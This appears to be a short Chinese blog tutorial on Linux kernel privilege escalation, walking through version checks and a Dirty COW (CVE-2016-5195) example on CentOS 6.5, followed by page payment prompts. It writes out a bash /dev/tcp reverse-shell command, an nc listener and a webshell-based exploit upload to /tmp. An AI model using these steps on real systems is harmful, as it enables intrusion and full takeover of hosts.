内网渗透之——linux本地漏洞提权之——溢出提权

利用系统内核提权漏洞基本思路

1.判断系统版本
    uname -a   (Linux查看操作系统内核信息) 
    cat /proc/version (Linux查看当前操作系统版本信息) 
    cat /etc/issue  或cat /etc/redhat-release(Linux查看版本当前操作系统发行版信息)

2.根据内核版本去找对应的exp

3.获取交互式shell(反弹端口)

bash -i >& /dev/tcp/自己的ip/自己的端口 0>&1

4.交互式shell里上传exp并编译
上传路径:/tmp(可读可写可执行目录)

实例:利用centos6.5复现脏牛漏洞(CVE-2016-5195)

1.查看内核版本,符合脏牛使用条件>2.6.2

2.获取交互式shell(反弹端口),菜刀虚拟终端输入命令:bash -i >& /dev/tcp/自己的ip/自己的端口 0>&1,nc输入nc.exe -lvvp 端口进行监听,之后会将shell弹出

3.用菜刀上传exp(dirty.c)到tmp文件

评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值